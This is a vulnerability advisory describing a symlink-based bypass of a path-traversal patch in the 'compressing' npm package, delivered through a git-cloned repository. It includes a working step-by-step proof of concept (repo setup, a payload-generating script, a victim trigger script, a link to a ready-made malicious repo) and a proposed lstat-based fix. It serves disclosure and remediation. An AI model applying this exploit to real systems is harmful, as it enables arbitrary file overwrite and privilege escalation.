CVE-2026-40931
Complete Bypass of CVE-2026-24884 Patch via Git-Delivered Symlink Poisoning in compressing
Description
**1. Executive Summary** This report documents a critical security research finding in the `compressing` npm package (specifically tested on the latest **v2.1.0**). The core vulnerability is a **Partial Fix Bypass** of **CVE-2026-24884**. The current patch relies on a purely logical string validation within the `isPathWithinParent` utility. This check verifies if a resolved path string starts with the destination directory string but fails to account for the **actual filesystem state**. By exploiting this "Logical vs. Physical" divergence, we successfully bypassed the security check using a Directory Poisoning technique (pre-existing symbolic links). **Key Findings:** * **Vulnerable Component:** `lib/utils.js` -> `isPathWithinParent()` * **Flaw Type:** Incomplete validation (lack of recursive `lstat` checks). * **Primary Attack Vector:** **Supply Chain via Git Clone** The attack requires zero victim interaction beyond standard developer workflow (`git clone` + `node app.js`). Git natively preserves symlinks during clone, automatically deploying the malicious symlink to victim's machine without any additional attacker access. * **Result:** Successfully achieved arbitrary file writes outside the intended extraction root on the latest library version. **2. Deep-Dive: Technical Root Cause Analysis** The vulnerability exists because of a fundamental disconnect between how the library **validates** a path and how the Operating System **executes** a write to that path. * **1. Logical Abstraction (The "String" World)** The developer uses `path.resolve(childPath)` to sanitize input. In Node.js, `path.resolve` is a literal string manipulator. It calculates an absolute path by processing `..` and `.` segments relative to each other. * **The Limitation:** `path.resolve` does **NOT** look at the disk. It does not know if a folder named `config` is a real folder or a symbolic link. * **The Result:** If the extraction target is `/app/out` and the entry is c`onfig/passwd`, `path.resolve` returns `/app/out/config/passwd`. Since this string starts with `/app/out/`, the security check returns **TRUE**. * **2. Physical Reality (The "Filesystem" World)** When the library proceeds to write the file using `fs.writeFile('/app/out/config/passwd', data)`, the execution is handed over to the Operating System's filesystem kernel. * **The Redirection:** If the attacker has pre-created a symbolic link on the disk at `/app/out/config` pointing to `/etc`, the OS kernel sees the write request and follows the link. * **The Divergence:** The OS resolves the path to `/etc/passwd`. The "Security Guard" (the library) thought it was writing to a local config folder, but the "Executioner" (the OS) followed the link into a sensitive system area. * **3. Visual Logic Flow** <img width="6582" height="3095" alt="Malicious Archive Exploit-2026-04-12-135626" src="https://github.com/user-attachments/assets/7c8235c3-f717-4296-b8e7-d6d498285fb2" /> * **4. Comparison with Industry Standards (`node-tar`)** A secure implementation (like `node-tar`) uses an **"Atomic Check"** strategy. Instead of trusting a string path, it iterates through every directory segment and calls `fs.lstatSync()`. If any segment is found to be a symbolic link, the extraction is halted immediately before any write operation is attempted. `compressing` lacks this critical recursive verification step. * **5. Git Clone as a Delivery Mechanism:** Git treats symlinks as first-class objects and restores them faithfully during clone. This means an attacker-controlled repository becomes a reliable delivery mechanism — the symlink is "pre-planted" automatically by git itself, removing any prerequisite of prior system access. **3. Comprehensive Attack Vector & Proof of Concept** **PoC Overview:** The Git Clone Vector This exploit leverages the fact that Git natively preserves symbolic links. By cloning a malicious repository, a victim unknowingly plants a "poisoned path" on their local disk. Why this is critical: * No social engineering required beyond a standard git clone. * The symlink is "pre-planted" by Git itself, removing the need for prior system access. * Victim's workflow remains indistinguishable from legitimate activity. **Step 1: Environment Preparation (Victim System)** >TIP **Prerequisite:** Ensure you have Node.js and npm installed on your Kali Linux. If you encounter a `MODULE_NOT_FOUND` error for `tar-stream` or `compressing`, `run: npm install `compressing@2.1.0 tar-stream` in your current working directory. Create a mock sensitive file to demonstrate the overwrite without damaging the actual OS. ``` # Workspace setup mkdir -p ~/poc-workspace cd ~/poc-workspace # 1. Create a fake sensitive file mkdir -p /tmp/fake_root/etc echo "root:SAFE_DATA_DO_NOT_OVERWRITE" > /tmp/fake_root/etc/passwd # 2. Install latest vulnerable library npm install compressing@2.1.0 tar-stream ``` **Step 2: Attacker Side (Repo & Payload)** **2.1 Create the poisoned GitHub Repository** 1. Create a repo named `compressing_poc_test` on GitHub. 2. On your local machine, setup the malicious content: ``` mkdir compressing_poc_test cd compressing_poc_test git init # CREATE THE TRAP: A symlink pointing to the sensitive target ln -s /tmp/fake_root/etc/passwd config_file # Setup Git git branch -M main git remote add origin https://github.com/USERNAME/compressing_poc_test.git ``` **2.2 Generate the Malicious Payload** Create a script `gen_payload.js` inside the parent folder (`~/poc-workspace`) to generate the exploit file: ``` const tar = require('tar-stream'); const fs = require('fs'); const pack = tar.pack(); // PAYLOAD: A plain file that matches the symlink name pack.entry({ name: 'config_file' }, 'root:PWNED_BY_THE_SUPPLY_CHAIN_ATTACK_V2.1.0\n'); pack.finalize(); pack.pipe(fs.createWriteStream('./payload.tar')); console.log('payload.tar generated successfully!'); ``` **Run the script to create the payload:** ``` node gen_payload.js ``` _This will create a **payload.tar** file in your current directory._ **2.3 Push Bait & Payload to GitHub** Now, move the generated payload into your repo folder and push everything to GitHub: ``` # Move the payload into the repo folder mv ../payload.tar . # Add all files (config_file symlink and payload.tar) git add . git commit -m "Add project updates and resource assets" git push -u origin main ``` > For your convenience and easy reproduction, I have already created a malicious repository to simulate the attacker's setup. You can clone it directly without needing to create a new one: https://github.com/sachinpatilpsp/compressing_poc_test.git **Step 3: Victim Side (The Compromise)** The victim clones the repo and runs an application that extracts the included `payload.tar`. ``` # 1. Simulate a developer cloning the repo cd ~/poc-workspace # In a real attack, the victim clones from your GitHub URL git clone https://github.com/USERNAME/compressing_poc_test.git victim_app cd victim_app # 2. Create the Trigger script (victim_app.js) cat <<EOF > victim_app.js const compressing = require('compressing'); async function extractUpdate() { console.log('--- Victim: Extracting Update Package ---'); try { // This triggers the bypass because 'config_file' already exists as a symlink await compressing.tar.uncompress('./payload.tar', './'); console.log('[+] Update Successful!'); } catch (err) { console.error('[-] Error:', err); } } extractUpdate(); EOF # 3. VERIFY THE OVERWRITE echo "--- Before Exploit ---" cat /tmp/fake_root/etc/passwd # 4. Run the victim_app.js node victim_app.js # 5. After Exploit Run echo "--- After Exploit ---" cat /tmp/fake_root/etc/passwd ``` **Why this bypass works** * **The Library's Logic:** `compressing` uses `path.resolve` on entry names and compares them string-wise with the destination directory. * **The Gap:** Because `path.resolve` does not check if intermediate directories are symlinks on disk, it treats `config_file` (the symlink) as a normal path inside the allowed directory. * **The Result:** The underlying `fs.writeFile` follows the existing symlink to the protected target (`/tmp/fake_root/etc/passwd`), bypassing all string-based security checks. <img width="733" height="126" alt="01_malicious_symlink_proof" src="https://github.com/user-attachments/assets/a24b5844-8efd-4f5c-8ee6-9cbbffee6ceb" /> <img width="780" height="111" alt="02_malicious_payload_content" src="https://github.com/user-attachments/assets/a20ef72b-35c9-4355-8583-08a3e9467d4a" /> <img width="888" height="111" alt="03_vulnerable_version_proof" src="https://github.com/user-attachments/assets/5e6864ce-fe48-4327-be2f-1bea8e8ba800" /> <img width="921" height="294" alt="04_exploit_success_verification" src="https://github.com/user-attachments/assets/3b4bc21e-55de-42b2-b819-8d7c0e90b055" /> **4. Impact Assessment** **What kind of vulnerability is it?** This is an **Arbitrary File Overwrite** vulnerability caused by a **Symlink Path Traversal** bypass. Specifically, it is a "Partial Fix" bypass where a security patch meant to prevent directory traversal only validates path strings but ignores the filesystem state (symlinks). **Who is impacted?** **1. Developers & Organizations:** Any user of the `compressing` library (up to **v2.1.0**) who extracts untrusted archives into a working directory. **2. Supply Chain via Git Clone (Primary Vector):** Git natively restores symlinks during git clone. An attacker who controls or compromises any upstream repository can embed malicious symlinks. The victim's only required action is standard developer workflow clone and run. No social engineering or extra steps needed beyond trusting a repository. **3. Privileged Environments:** Systems where the extraction process runs as a high-privilege user (root/admin), as it allows for the overwriting of sensitive system files like `/etc/passwd` or `/etc/shadow`. **Impact Details** * **Privilege Escalation:** Gaining root access by overwriting system configuration files. * **Remote Code Execution (RCE):** Overwriting executable binaries or startup scripts (.bashrc, .profile) to run malicious code upon the next boot or login. * **Data Corruption:** Permanent loss or modification of application data and database files. * **Reputational Damage to Library:** Loss of trust in the compressing library's security architecture due to an incomplete patch for a known CVE. **5. Technical Remediation & Proposed Fix** To completely fix this vulnerability, the library must transition from **String-based validation** to **State-aware validation**. **1. The Vulnerable Code (Current Incomplete Patch)** The current logic in **lib/utils.js** only checks the path string: ``` // [VULNERABLE] Does not check if disk segments are symlinks function isPathWithinParent(childPath, parentPath) { const normalizedChild = path.resolve(childPath); const normalizedParent = path.resolve(parentPath); // ... (omitted startsWith check) return normalizedChild.startsWith(parentWithSep); } ``` **2. The Proposed Fix (Complete Mitigation)** The library must recursively check every component of the path on the disk using `fs.lstatSync` to ensure no component is a symbolic link that redirects to a location outside the root. ``` const fs = require('fs'); const path = require('path'); /** * SECURE VALIDATION: Checks every segment of the path on disk * to prevent symlink-based directory poisoning. */ function secureIsPathWithinParent(childPath, parentPath) { const absoluteDest = path.resolve(parentPath); const absoluteChild = path.resolve(childPath); // Basic string check first if (!absoluteChild.startsWith(absoluteDest + path.sep) && absoluteChild !== absoluteDest) { return false; } // RECURSIVE DISK CHECK // Iteratively check every directory segment from the root to the file let currentPath = absoluteDest; const relativeParts = path.relative(absoluteDest, absoluteChild).split(path.sep); for (const part of relativeParts) { if (!part || part === '.') continue; currentPath = path.join(currentPath, part); try { const stats = fs.lstatSync(currentPath); // IF ANY COMPONENT IS A SYMLINK, REJECT IT if (stats.isSymbolicLink()) { throw new Error(`Security Exception: Symlink detected at ${currentPath}`); } } catch (err) { if (err.code === 'ENOENT') break; // Path doesn't exist yet, which is fine throw err; } } return true; } ``` **3. Why and How it works:** * **Filesystem Awareness:** Unlike the previous fix, this code uses `fs.lstatSync`. It doesn't trust the string; it asks the Operating System, "What is actually at this location?". * **Segmented Verification:** By splitting the path and checking each part (`config`, then `config/file`), it catches the "Poisoned Directory" (`config -> /etc`) before the final write happens. * **Bypass Prevention:** Even if the string check passes, the loop will detect the symlink at the `config` segment and throw a security exception, stopping the `fs.writeFile` before it can follow the link to `/etc/passwd`. * **Atomic Security:** This implementation ensures that the logical path and the physical path are identical, leaving no room for "Divergence" exploits. > **Note:** For production, it is recommended to use the asynchronous `fs.promises.lstat` to prevent blocking the Node.js event loop during recursive checks.